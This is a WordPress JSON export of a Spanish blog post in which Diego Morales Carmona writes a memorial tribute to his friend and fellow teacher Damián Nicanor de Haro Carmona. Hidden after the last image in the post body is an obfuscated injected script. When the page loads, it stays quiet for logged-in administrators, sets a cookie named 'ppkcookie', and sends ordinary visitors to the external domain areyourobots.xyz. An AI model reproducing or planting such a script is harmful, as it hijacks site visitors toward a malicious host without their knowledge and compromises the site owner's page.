{"id":3836,"date":"2018-11-30T09:54:09","date_gmt":"2018-11-30T09:54:09","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=3836"},"modified":"2018-11-30T09:56:42","modified_gmt":"2018-11-30T09:56:42","slug":"in-memoriam-a-un-gran-amigo-noble-y-leal-excelente-profesor-y-amigo-de-sus-amigos-d-damian-nicanor-de-haro-carmona","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2018\/11\/30\/in-memoriam-a-un-gran-amigo-noble-y-leal-excelente-profesor-y-amigo-de-sus-amigos-d-damian-nicanor-de-haro-carmona\/","title":{"rendered":"\u00abIN MEMORIAM\u00bb A UN GRAN AMIGO NOBLE Y LEAL, EXCELENTE PROFESOR, Y AMIGO DE SUS AMIGOS: D. DAMI\u00c1N NICANOR DE HARO CARMONA"},"content":{"rendered":"<p>\u00abIN MEMORIAM\u00bb A UN GRAN AMIGO NOBLE Y LEAL, EXCELENTE PROFESOR, Y AMIGO DE SUS AMIGOS: D. DAMI\u00c1N NICANOR DE HARO CARMONA<\/p>\n<p><!--more--><\/p>\n<p style=\"text-align: right\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/11\/diego-morales-carmona.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-medium wp-image-3837\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/11\/diego-morales-carmona-250x300.jpg\" alt=\"\" width=\"250\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/11\/diego-morales-carmona-250x300.jpg 250w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/11\/diego-morales-carmona.jpg 425w\" sizes=\"(max-width: 250px) 100vw, 250px\" \/><\/a><\/p>\n<p style=\"text-align: right\">Diego Morales Carmona<br \/>\n25 de noviembre a las 2:22<\/p>\n<p style=\"text-align: left\">\u00abIN MEMORIAM\u00bb A UN GRAN AMIGO NOBLE Y LEAL, EXCELENTE PROFESOR, Y AMIGO DE SUS AMIGOS: D. DAMI\u00c1N NICANOR DE HARO CARMONA.<br \/>\nHan transcurrido varios d\u00edas desde que nos dejaste y la herida de profundo y hondo calado en nuestros corazones se hace manifiesta, patente, abierta y plena tras la impronta que nos dejaste por tu imborrable recuerdo. No soportamos que te hayas ido tan joven, alegre y jovial. Transmit\u00edas \u00e1nimo, agradabilidad y encanto. \u00a1Cu\u00e1nto te echaremos de menos quienes te conocimos! Y, ahora, cuando ya no est\u00e1s, visionamos tus propios recuerdos, los nuestros, dig\u00e1moslo mejor, los compartidos.<br \/>\nCompart\u00ed contigo ratos entra\u00f1ables. Siempre, en nuestras conversaciones, tu querido padre, compa\u00f1ero de trabajo de mi esposa; tu madre, mi prima Anita, mujer muy apreciada y querida por m\u00ed; tu Pilar, resoluta, agradable y simp\u00e1tica sin que nada se le oscureciera; tu Enriquito, mi alumno predilecto junto a su inseparable amigo Ram\u00f3n; tu hermano Javier, cordial al igual que su esposa; Mar\u00eda Dolores y Patxi, serviciales y maravillosas personas. Los hijos de \u00e9stos, encantadores y, perm\u00edtanme Vds., mi expreso perd\u00f3n si alguien me dejo en el olvido. Dicho esto, ahora me viene a la memoria Mar\u00eda Josefa, su abuela.<br \/>\nMuchos a\u00f1os juntos de colegio, de nivel compartido, de aprendizaje, de tus ilustres ense\u00f1anzas, de trabajo conjunto, de tus consejos y los m\u00edos. Ya, amigo del alma, todo en tu recuerdo y en el m\u00edo, que, seguro, me est\u00e1s leyendo y lo est\u00e1s haciendo, ahora, desde la otra vida. Tu alma, ya en el m\u00e1s all\u00e1, habr\u00e1 ponderado tu existencia y el Creador te habr\u00e1 acogido a su diestra porque en la Tierra, nuestro planeta, tu forma de vida, ejemplaridad y comportamiento fue intachable e inmejorable. Todo un aut\u00e9ntico caballero.<br \/>\nMira, amigo Nicanor, me veo obligado a decirlo: sent\u00eda envidia cuando junto a tus coet\u00e1neos, amigos de por vida: Anto\u00f1ico Mart\u00ednez, Manolo Ruiz, Antonio Gallardo, Ur\u00eda, Sebas, Santos, Ram\u00f3n Carmona, Domingo, Juan Bautista, Pepe Acacio y otros, en tertulias, la amistad que imperaba en vosotros, f\u00e9rrea e inc\u00f3lume por esencia y naturaleza, me hac\u00eda pensar, con detenimiento, por supuesto, siendo una d\u00e9cada todos m\u00e1s j\u00f3venes que yo, la satisfacci\u00f3n que me produc\u00eda el veros tan saludables, con buen humor, alegres y de buen venir.<br \/>\nVayan estas l\u00edneas por ti, amigo del alma. \u00a1Qu\u00e9 Dios te acoja en su Gloria!<\/p>\n<p style=\"text-align: right\">Autor: Diego Morales Carmona.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/11\/nicanor-haro-carmona.jpg\"><img decoding=\"async\" class=\"size-medium wp-image-3839 aligncenter\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/11\/nicanor-haro-carmona-214x300.jpg\" alt=\"\" width=\"214\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/11\/nicanor-haro-carmona-214x300.jpg 214w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/11\/nicanor-haro-carmona.jpg 300w\" sizes=\"(max-width: 214px) 100vw, 214px\" \/><\/a><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u00abIN MEMORIAM\u00bb A UN GRAN AMIGO NOBLE Y LEAL, EXCELENTE PROFESOR, Y AMIGO DE SUS AMIGOS: D. DAMI\u00c1N NICANOR DE HARO CARMONA<\/p>\n","protected":false},"author":7,"featured_media":3839,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[20,2],"tags":[],"class_list":["post-3836","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-colaboraciones","category-educacion"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/3836","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=3836"}],"version-history":[{"count":3,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/3836\/revisions"}],"predecessor-version":[{"id":3841,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/3836\/revisions\/3841"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/3839"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=3836"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=3836"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=3836"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}